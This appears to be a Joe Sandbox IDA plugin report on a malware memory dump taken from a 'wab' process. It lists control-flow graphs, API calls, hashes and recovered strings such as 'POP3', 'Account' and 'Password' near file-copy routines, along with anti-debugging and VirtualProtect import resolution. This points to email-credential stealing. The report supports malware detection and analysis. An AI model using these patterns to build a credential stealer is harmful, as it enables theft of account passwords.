                                      • Part of subcall function 23DCC803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,23DCC7F4,23DCC7DD), ref: 23DCC82A
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.3531569609.0000000023DC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23DC0000, based on PE: true
                                    • Associated: 00000009.00000002.3531552324.0000000023DC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000009.00000002.3531569609.0000000023DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_23dc0000_wab.jbxd
                                    Similarity
                                    • API ID: AddressHandleModuleProcProtectVirtual
                                    • String ID:
                                    • API String ID: 2099061454-0
                                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                    • Instruction ID: 78c3aba3a396c824507052ab2ae790f18383350b8ba07e64b4d53386051b699e
                                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                    • Instruction Fuzzy Hash: E801D200A753C178AA2166B40C01AAB5FDCBF27A60B181FDEE340C71B3D9A08507C3BA

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 80 23dcc7a7-23dcc7bc 81 23dcc82d 80->81 82 23dcc7be-23dcc7c6 80->82 84 23dcc82f-23dcc833 81->84 82->81 83 23dcc7c8-23dcc7f6 call 23dcc7e6 82->83 91 23dcc86c 83->91 92 23dcc7f8 83->92 86 23dcc835-23dcc83d GetModuleHandleA 84->86 87 23dcc872 call 23dcc877 84->87 90 23dcc83f-23dcc847 86->90 90->90 93 23dcc849-23dcc84c 90->93 94 23dcc86d-23dcc86e 91->94 95 23dcc7fa-23dcc7fc 92->95 96 23dcc85b-23dcc85e 92->96 93->84 97 23dcc84e-23dcc850 93->97 98 23dcc866-23dcc86b 94->98 99 23dcc870 94->99 95->94 101 23dcc7fe 95->101 100 23dcc85f-23dcc860 GetProcAddress 96->100 102 23dcc856-23dcc85a 97->102 103 23dcc852-23dcc854 97->103 98->91 99->93 104 23dcc865 100->104 101->104 105 23dcc800-23dcc80b GetProcAddress 101->105 102->96 103->100 104->98 105->81 106 23dcc80d-23dcc81a VirtualProtect 105->106 107 23dcc82c 106->107 108 23dcc81c-23dcc82a VirtualProtect 106->108 107->81 108->107
                                    APIs
                                    • GetModuleHandleA.KERNEL32(?,23DCC7DD), ref: 23DCC838
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 23DCC860
                                      • Part of subcall function 23DCC7E6: GetModuleHandleA.KERNEL32(23DCC7DD), ref: 23DCC7E6
                                      • Part of subcall function 23DCC7E6: GetProcAddress.KERNEL32(00000000,23DCC7F4), ref: 23DCC804
                                      • Part of subcall function 23DCC7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,23DCC7F4,23DCC7DD), ref: 23DCC816
                                      • Part of subcall function 23DCC7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,23DCC7F4,23DCC7DD), ref: 23DCC82A
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.3531569609.0000000023DC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23DC0000, based on PE: true
                                    • Associated: 00000009.00000002.3531552324.0000000023DC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000009.00000002.3531569609.0000000023DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_23dc0000_wab.jbxd
                                    Similarity
                                    • API ID: AddressHandleModuleProcProtectVirtual
                                    • String ID:
                                    • API String ID: 2099061454-0
                                    • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                    • Instruction ID: 1b90dd2f81ea27ad9de9d5343fb1c4a2d01608d73dae3233b1783749739289a9
                                    • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                    • Instruction Fuzzy Hash: 4A21E5615683C16EEB229BB44C04BA76FD8AF17660F1D0EDED340CB1A3D5A88547C3B6

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 109 23dcc803-23dcc80b GetProcAddress 110 23dcc82d 109->110 111 23dcc80d-23dcc81a VirtualProtect 109->111 114 23dcc82f-23dcc833 110->114 112 23dcc82c 111->112 113 23dcc81c-23dcc82a VirtualProtect 111->113 112->110 113->112 115 23dcc835-23dcc83d GetModuleHandleA 114->115 116 23dcc872 call 23dcc877 114->116 118 23dcc83f-23dcc847 115->118 118->118 119 23dcc849-23dcc84c 118->119 119->114 120 23dcc84e-23dcc850 119->120 121 23dcc856-23dcc85e 120->121 122 23dcc852-23dcc854 120->122 123 23dcc85f-23dcc865 GetProcAddress 121->123 122->123 126 23dcc866-23dcc86e 123->126 129 23dcc870 126->129 129->119
                                    APIs
                                    • GetProcAddress.KERNEL32(00000000,23DCC7F4), ref: 23DCC804
                                    • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,23DCC7F4,23DCC7DD), ref: 23DCC816
                                    • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,23DCC7F4,23DCC7DD), ref: 23DCC82A
                                    • GetModuleHandleA.KERNEL32(?,23DCC7DD), ref: 23DCC838
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 23DCC860
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.3531569609.0000000023DC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23DC0000, based on PE: true
                                    • Associated: 00000009.00000002.3531552324.0000000023DC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000009.00000002.3531569609.0000000023DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_23dc0000_wab.jbxd
                                    Similarity
                                    • API ID: AddressProcProtectVirtual$HandleModule
                                    • String ID:
                                    • API String ID: 2152742572-0
                                    • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                    • Instruction ID: bf3946a6d91e41c5f466665dde709c02ad175f72517722d659dbab8e3e5c41d1
                                    • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                    • Instruction Fuzzy Hash: 2CF0F6416A53C07CFA2265B41C41EB75FCCAF27A60B181EDEE340C71A3D895850783FA
                                    APIs
                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 23DC61DA
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 23DC61E4
                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 23DC61F1
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.3531569609.0000000023DC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23DC0000, based on PE: true
                                    • Associated: 00000009.00000002.3531552324.0000000023DC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000009.00000002.3531569609.0000000023DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_23dc0000_wab.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                    • String ID:
                                    • API String ID: 3906539128-0
                                    • Opcode ID: 688b598bd5f4071960be1a9f3976174586f138d9114c6f9067e8ff1e189dcf69
                                    • Instruction ID: c7f84224b90db7b8e5ad35887bdcbee4c6afd9a0f54ab37a3fdbb3aecc02d395
                                    • Opcode Fuzzy Hash: 688b598bd5f4071960be1a9f3976174586f138d9114c6f9067e8ff1e189dcf69
                                    • Instruction Fuzzy Hash: FF31057591131C9BCB21DF28D98878DBBB8BF18710F1045EAE81CA7250EB349F918F54
                                    APIs
                                    • GetCurrentProcess.KERNEL32(?,?,23DC4A8A,?,23DD2238,0000000C,23DC4BBD,00000000,00000000,00000001,23DC2082,23DD2108,0000000C,23DC1F3A,?), ref: 23DC4AD5
                                    • TerminateProcess.KERNEL32(00000000,?,23DC4A8A,?,23DD2238,0000000C,23DC4BBD,00000000,00000000,00000001,23DC2082,23DD2108,0000000C,23DC1F3A,?), ref: 23DC4ADC
                                    • ExitProcess.KERNEL32 ref: 23DC4AEE
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.3531569609.0000000023DC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23DC0000, based on PE: true
                                    • Associated: 00000009.00000002.3531552324.0000000023DC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000009.00000002.3531569609.0000000023DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_23dc0000_wab.jbxd
                                    Similarity
                                    • API ID: Process$CurrentExitTerminate
                                    • String ID:
                                    • API String ID: 1703294689-0
                                    • Opcode ID: 5c9a3f9b333e7010dddbe1e6e25657653e7feeac1f6b348b8e9b4105923097d4
                                    • Instruction ID: 94dff73f6090d4facdc99e6f6b3e20d350dba2f3d1c0c142e455053816b51a64
                                    • Opcode Fuzzy Hash: 5c9a3f9b333e7010dddbe1e6e25657653e7feeac1f6b348b8e9b4105923097d4
                                    • Instruction Fuzzy Hash: 5DE04636120289AFCF027F68CD09A4A3B3AFF10741B104858FA088B021CB39E963EA54
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.3531569609.0000000023DC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23DC0000, based on PE: true
                                    • Associated: 00000009.00000002.3531552324.0000000023DC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000009.00000002.3531569609.0000000023DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_23dc0000_wab.jbxd
                                    Similarity
                                    • API ID: HeapProcess
                                    • String ID:
                                    • API String ID: 54951025-0
                                    • Opcode ID: c0eee51713291ccbac3ec00dd210610602e95500d2ff5333af03d2d0b95f592a
                                    • Instruction ID: 3a96f7e9f887e43b47512cae73a047588e1df5b1a627d361b59d4f8ae7d6d0b0
                                    • Opcode Fuzzy Hash: c0eee51713291ccbac3ec00dd210610602e95500d2ff5333af03d2d0b95f592a
                                    • Instruction Fuzzy Hash: 0FA0113220020B8F8300AF388A0A20C3AACAA20280300002AA808C8000EB38C020AA08

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 139 23dc173a-23dc17fe call 23dcc030 call 23dc2c40 * 2 146 23dc1803 call 23dc1cca 139->146 147 23dc1808-23dc180c 146->147 148 23dc19ad-23dc19b1 147->148 149 23dc1812-23dc1816 147->149 149->148 150 23dc181c-23dc1837 call 23dc1ede 149->150 153 23dc183d-23dc1845 150->153 154 23dc199f-23dc19ac call 23dc1ee7 * 2 150->154 156 23dc184b-23dc184e 153->156 157 23dc1982-23dc1985 153->157 154->148 156->157 161 23dc1854-23dc1881 call 23dc44b0 * 2 call 23dc1db7 156->161 159 23dc1995-23dc1999 157->159 160 23dc1987 157->160 159->153 159->154 163 23dc198a-23dc198d call 23dc2c40 160->163 173 23dc193d-23dc1943 161->173 174 23dc1887-23dc189f call 23dc44b0 call 23dc1db7 161->174 169 23dc1992 163->169 169->159 176 23dc197e-23dc1980 173->176 177 23dc1945-23dc1947 173->177 174->173 190 23dc18a5-23dc18a8 174->190 176->163 177->176 179 23dc1949-23dc194b 177->179 180 23dc194d-23dc194f 179->180 181 23dc1961-23dc197c call 23dc16aa 179->181 183 23dc1955-23dc1957 180->183 184 23dc1951-23dc1953 180->184 181->169 187 23dc195d-23dc195f 183->187 188 23dc1959-23dc195b 183->188 184->181 184->183 187->176 187->181 188->181 188->187 191 23dc18aa-23dc18c2 call 23dc44b0 call 23dc1db7 190->191 192 23dc18c4-23dc18dc call 23dc44b0 call 23dc1db7 190->192 191->192 201 23dc18e2-23dc193b call 23dc16aa call 23dc15da call 23dc2c40 * 2 191->201 192->159 192->201 201->159
                                    APIs
                                      • Part of subcall function 23DC1CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 23DC1D1B
                                      • Part of subcall function 23DC1CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 23DC1D37
                                      • Part of subcall function 23DC1CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23DC1D4B
                                    • _strlen.LIBCMT ref: 23DC1855
                                    • _strlen.LIBCMT ref: 23DC1869
                                    • _strlen.LIBCMT ref: 23DC188B
                                    • _strlen.LIBCMT ref: 23DC18AE
                                    • _strlen.LIBCMT ref: 23DC18C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.3531569609.0000000023DC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23DC0000, based on PE: true
                                    • Associated: 00000009.00000002.3531552324.0000000023DC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000009.00000002.3531569609.0000000023DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_23dc0000_wab.jbxd
                                    Similarity
                                    • API ID: _strlen$File$CopyCreateDelete
                                    • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                    • API String ID: 3296212668-3023110444
                                    • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                    • Instruction ID: b7afb94d74f920822b83d31d33a12b089c7bf22b799b33472ece249d7be910a1
                                    • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                    • Instruction Fuzzy Hash: 3D6148B1D203A8ABEF218BA4C840BDEF7B9AF25200F1449DED215A7250DF705A47CB65

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.3531569609.0000000023DC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23DC0000, based on PE: true
                                    • Associated: 00000009.00000002.3531552324.0000000023DC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000009.00000002.3531569609.0000000023DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_23dc0000_wab.jbxd
                                    Similarity
                                    • API ID: _strlen
                                    • String ID: %m$~$Gon~$~F@7$~dra
                                    • API String ID: 4218353326-230879103
                                    • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                    • Instruction ID: 0d634b78ebc2a47281cc31c06681895f004d63fe474656369fce44156734300e
                                    • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                    • Instruction Fuzzy Hash: 1F712971D242A85BCF229BB48894ADF7BFCAF15600F1448DEE544D3141EA74DB46CBA4

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 279 23dc7cc2-23dc7cd6 280 23dc7cd8-23dc7cdd 279->280 281 23dc7d44-23dc7d4c 279->281 280->281 282 23dc7cdf-23dc7ce4 280->282 283 23dc7d4e-23dc7d51 281->283 284 23dc7d93-23dc7dab call 23dc7e35 281->284 282->281 285 23dc7ce6-23dc7ce9 282->285 283->284 287 23dc7d53-23dc7d90 call 23dc571e * 4 283->287 294 23dc7dae-23dc7db5 284->294 285->281 289 23dc7ceb-23dc7cf3 285->289 287->284 292 23dc7d0d-23dc7d15 289->292 293 23dc7cf5-23dc7cf8 289->293 296 23dc7d2f-23dc7d43 call 23dc571e * 2 292->296 297 23dc7d17-23dc7d1a 292->297 293->292 298 23dc7cfa-23dc7d0c call 23dc571e call 23dc90ba 293->298 299 23dc7dd4-23dc7dd8 294->299 300 23dc7db7-23dc7dbb 294->300 296->281 297->296 302 23dc7d1c-23dc7d2e call 23dc571e call 23dc91b8 297->302 298->292 303 23dc7dda-23dc7ddf 299->303 304 23dc7df0-23dc7dfc 299->304 307 23dc7dbd-23dc7dc0 300->307 308 23dc7dd1 300->308 302->296 311 23dc7ded 303->311 312 23dc7de1-23dc7de4 303->312 304->294 314 23dc7dfe-23dc7e0b call 23dc571e 304->314 307->308 316 23dc7dc2-23dc7dd0 call 23dc571e * 2 307->316 308->299 311->304 312->311 319 23dc7de6-23dc7dec call 23dc571e 312->319 316->308 319->311
                                    APIs
                                    • ___free_lconv_mon.LIBCMT ref: 23DC7D06
                                      • Part of subcall function 23DC90BA: _free.LIBCMT ref: 23DC90D7
                                      • Part of subcall function 23DC90BA: _free.LIBCMT ref: 23DC90E9
                                      • Part of subcall function 23DC90BA: _free.LIBCMT ref: 23DC90FB
                                      • Part of subcall function 23DC90BA: _free.LIBCMT ref: 23DC910D
                                      • Part of subcall function 23DC90BA: _free.LIBCMT ref: 23DC911F
                                      • Part of subcall function 23DC90BA: _free.LIBCMT ref: 23DC9131
                                      • Part of subcall function 23DC90BA: _free.LIBCMT ref: 23DC9143
                                      • Part of subcall function 23DC90BA: _free.LIBCMT ref: 23DC9155
                                      • Part of subcall function 23DC90BA: _free.LIBCMT ref: 23DC9167
                                      • Part of subcall function 23DC90BA: _free.LIBCMT ref: 23DC9179
                                      • Part of subcall function 23DC90BA: _free.LIBCMT ref: 23DC918B
                                      • Part of subcall function 23DC90BA: _free.LIBCMT ref: 23DC919D
                                      • Part of subcall function 23DC90BA: _free.LIBCMT ref: 23DC91AF
                                    • _free.LIBCMT ref: 23DC7CFB
                                      • Part of subcall function 23DC571E: HeapFree.KERNEL32(00000000,00000000,?,23DC924F,?,00000000,?,00000000,?,23DC9276,?,00000007,?,?,23DC7E5A,?), ref: 23DC5734
                                      • Part of subcall function 23DC571E: GetLastError.KERNEL32(?,?,23DC924F,?,00000000,?,00000000,?,23DC9276,?,00000007,?,?,23DC7E5A,?,?), ref: 23DC5746
                                    • _free.LIBCMT ref: 23DC7D1D
                                    • _free.LIBCMT ref: 23DC7D32
                                    • _free.LIBCMT ref: 23DC7D3D
                                    • _free.LIBCMT ref: 23DC7D5F
                                    • _free.LIBCMT ref: 23DC7D72
                                    • _free.LIBCMT ref: 23DC7D80
                                    • _free.LIBCMT ref: 23DC7D8B
                                    • _free.LIBCMT ref: 23DC7DC3
                                    • _free.LIBCMT ref: 23DC7DCA
                                    • _free.LIBCMT ref: 23DC7DE7
                                    • _free.LIBCMT ref: 23DC7DFF
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.3531569609.0000000023DC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23DC0000, based on PE: true
                                    • Associated: 00000009.00000002.3531552324.0000000023DC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000009.00000002.3531569609.0000000023DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_23dc0000_wab.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                    • String ID:
                                    • API String ID: 161543041-0
                                    • Opcode ID: 61061ece10eb62157f6dfb6acfa911cdcb18a34f09703a5057feae40f148c10b
                                    • Instruction ID: a165b15dbc5925000f304eaceb86c5e961fb7354e6b57f6e0f0d189e3ac024ad
                                    • Opcode Fuzzy Hash: 61061ece10eb62157f6dfb6acfa911cdcb18a34f09703a5057feae40f148c10b
                                    • Instruction Fuzzy Hash: 80316D32620385DFEB21AB39D940B6777EAEF00650F144CEDE859D7191DE31E980CB24

                                    Control-flow Graph

                                    APIs
                                    • _free.LIBCMT ref: 23DC59EA
                                      • Part of subcall function 23DC571E: HeapFree.KERNEL32(00000000,00000000,?,23DC924F,?,00000000,?,00000000,?,23DC9276,?,00000007,?,?,23DC7E5A,?), ref: 23DC5734
                                      • Part of subcall function 23DC571E: GetLastError.KERNEL32(?,?,23DC924F,?,00000000,?,00000000,?,23DC9276,?,00000007,?,?,23DC7E5A,?,?), ref: 23DC5746
                                    • _free.LIBCMT ref: 23DC59F6
                                    • _free.LIBCMT ref: 23DC5A01
                                    • _free.LIBCMT ref: 23DC5A0C
                                    • _free.LIBCMT ref: 23DC5A17
                                    • _free.LIBCMT ref: 23DC5A22
                                    • _free.LIBCMT ref: 23DC5A2D
                                    • _free.LIBCMT ref: 23DC5A38
                                    • _free.LIBCMT ref: 23DC5A43
                                    • _free.LIBCMT ref: 23DC5A51
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.3531569609.0000000023DC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23DC0000, based on PE: true
                                    • Associated: 00000009.00000002.3531552324.0000000023DC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000009.00000002.3531569609.0000000023DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_23dc0000_wab.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 1723b135c4cad171253d966480dbe89495baf94d2d1cd8fb859b140239e3dc54
                                    • Instruction ID: 52c6538bbda375ff5ed0bc1e6acb5df4271c138b112ccd1028c69f1aa8b4f3be
                                    • Opcode Fuzzy Hash: 1723b135c4cad171253d966480dbe89495baf94d2d1cd8fb859b140239e3dc54
                                    • Instruction Fuzzy Hash: CD11B67A520288FFCB21DF56C841DDE3FA6FF14350B0545E9FA088F261DA31DA909BA0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 363 23dcaa53-23dcaa6e 364 23dcaa80 363->364 365 23dcaa70-23dcaa7e RtlDecodePointer 363->365 366 23dcaa85-23dcaa8b 364->366 365->366 367 23dcaa91 366->367 368 23dcabb2-23dcabb5 366->368 369 23dcaba6 367->369 370 23dcaa97-23dcaa9a 367->370 371 23dcabb7-23dcabba 368->371 372 23dcac12 368->372 373 23dcaba8-23dcabad 369->373 374 23dcab47-23dcab4a 370->374 375 23dcaaa0 370->375 377 23dcabbc-23dcabbf 371->377 378 23dcac06 371->378 376 23dcac19 372->376 379 23dcac5b-23dcac6a call 23dc2ada 373->379 385 23dcab4c-23dcab4f 374->385 386 23dcab9d-23dcaba4 374->386 380 23dcab34-23dcab42 375->380 381 23dcaaa6-23dcaaab 375->381 382 23dcac20-23dcac49 376->382 383 23dcabfa 377->383 384 23dcabc1-23dcabc4 377->384 378->372 380->382 387 23dcaaad-23dcaab0 381->387 388 23dcab25-23dcab2f 381->388 410 23dcac4b-23dcac50 call 23dc6368 382->410 411 23dcac56-23dcac59 382->411 383->378 389 23dcabee 384->389 390 23dcabc6-23dcabc9 384->390 391 23dcab94-23dcab9b 385->391 392 23dcab51-23dcab54 385->392 394 23dcab61-23dcab8f 386->394 395 23dcab1c-23dcab23 387->395 396 23dcaab2-23dcaab5 387->396 388->382 389->383 398 23dcabcb-23dcabd0 390->398 399 23dcabe2 390->399 391->376 392->379 400 23dcab5a 392->400 394->411 402 23dcaac7-23dcaaf7 395->402 403 23dcab0d-23dcab17 396->403 404 23dcaab7-23dcaaba 396->404 405 23dcabdb-23dcabe0 398->405 406 23dcabd2-23dcabd5 398->406 399->389 400->394 402->411 417 23dcaafd-23dcab08 call 23dc6368 402->417 403->382 404->379 408 23dcaac0 404->408 405->373 406->379 406->405 408->402 410->411 411->379 417->411
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.3531569609.0000000023DC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23DC0000, based on PE: true
                                    • Associated: 00000009.00000002.3531552324.0000000023DC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000009.00000002.3531569609.0000000023DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_23dc0000_wab.jbxd
                                    Similarity
                                    • API ID: DecodePointer
                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                    • API String ID: 3527080286-3064271455
                                    • Opcode ID: bd584fabbc96b1a6af3f16068ed492eeb6f1230c9ee3991301bc4f5c2b92f916
                                    • Instruction ID: 0ec121d76c2f907dc62c6752db653b4ca9ae3775e9e87a852279f8a2cded04a3
                                    • Opcode Fuzzy Hash: bd584fabbc96b1a6af3f16068ed492eeb6f1230c9ee3991301bc4f5c2b92f916
                                    • Instruction Fuzzy Hash: D751617692058ECBDF01AFA8DA845DC7BB5FB09610F144ACDE581A7254C7358E29CB18

                                    Control-flow Graph

                                    APIs
                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 23DC1D1B
                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 23DC1D37
                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23DC1D4B
                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23DC1D58
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23DC1D72
                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23DC1D7D
                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23DC1D8A
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.3531569609.0000000023DC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23DC0000, based on PE: true
                                    • Associated: 00000009.00000002.3531552324.0000000023DC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000009.00000002.3531569609.0000000023DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_23dc0000_wab.jbxd
                                    Similarity
                                    • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                    • String ID:
                                    • API String ID: 1454806937-0
                                    • Opcode ID: 0ce1cedef6f0bc7eafa0799249426d898279df0e74bbf4f4d22ebde60e8f6dc4
                                    • Instruction ID: 12614f0422bc588081834de676751c4d98b3c4544d3fc2e6c9f59a9e30bf342b
                                    • Opcode Fuzzy Hash: 0ce1cedef6f0bc7eafa0799249426d898279df0e74bbf4f4d22ebde60e8f6dc4
                                    • Instruction Fuzzy Hash: 652190B295122DBFDB11ABA48C8CFEB76BCEB28355F000DAAF501D3144D6749E469B70

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 437 23dc9492-23dc94ef GetConsoleCP 438 23dc94f5-23dc9511 437->438 439 23dc9632-23dc9644 call 23dc2ada 437->439 441 23dc952c-23dc953d call 23dc7c19 438->441 442 23dc9513-23dc952a 438->442 449 23dc953f-23dc9542 441->449 450 23dc9563-23dc9565 441->450 444 23dc9566-23dc9575 call 23dc79e6 442->444 444->439 451 23dc957b-23dc959b WideCharToMultiByte 444->451 452 23dc9548-23dc955a call 23dc79e6 449->452 453 23dc9609-23dc9628 449->453 450->444 451->439 454 23dc95a1-23dc95b7 WriteFile 451->454 452->439 460 23dc9560-23dc9561 452->460 453->439 456 23dc95b9-23dc95ca 454->456 457 23dc962a-23dc9630 GetLastError 454->457 456->439 459 23dc95cc-23dc95d0 456->459 457->439 461 23dc95fe-23dc9601 459->461 462 23dc95d2-23dc95f0 WriteFile 459->462 460->451 461->438 464 23dc9607 461->464 462->457 463 23dc95f2-23dc95f6 462->463 463->439 465 23dc95f8-23dc95fb 463->465 464->439 465->461
                                    APIs
                                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,23DC9C07,?,00000000,?,00000000,00000000), ref: 23DC94D4
                                    • __fassign.LIBCMT ref: 23DC954F
                                    • __fassign.LIBCMT ref: 23DC956A
                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 23DC9590
                                    • WriteFile.KERNEL32(?,?,00000000,23DC9C07,00000000,?,?,?,?,?,?,?,?,?,23DC9C07,?), ref: 23DC95AF
                                    • WriteFile.KERNEL32(?,?,00000001,23DC9C07,00000000,?,?,?,?,?,?,?,?,?,23DC9C07,?), ref: 23DC95E8
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.3531569609.0000000023DC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23DC0000, based on PE: true
                                    • Associated: 00000009.00000002.3531552324.0000000023DC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000009.00000002.3531569609.0000000023DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_23dc0000_wab.jbxd
                                    Similarity
                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                    • String ID:
                                    • API String ID: 1324828854-0
                                    • Opcode ID: 2403c9bde740fe414947a8d68ec86f50d30f0cb848cc3e662de6f1265ae5eba0
                                    • Instruction ID: ab7357347be7e388eafac28916c625404efb22c604293286ab7649e9ddf8785a
                                    • Opcode Fuzzy Hash: 2403c9bde740fe414947a8d68ec86f50d30f0cb848cc3e662de6f1265ae5eba0
                                    • Instruction Fuzzy Hash: 0451A271D20289AFCB10CFA8C895BEEBBF8FF19700F14495EE555E7281D6309951CB64

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
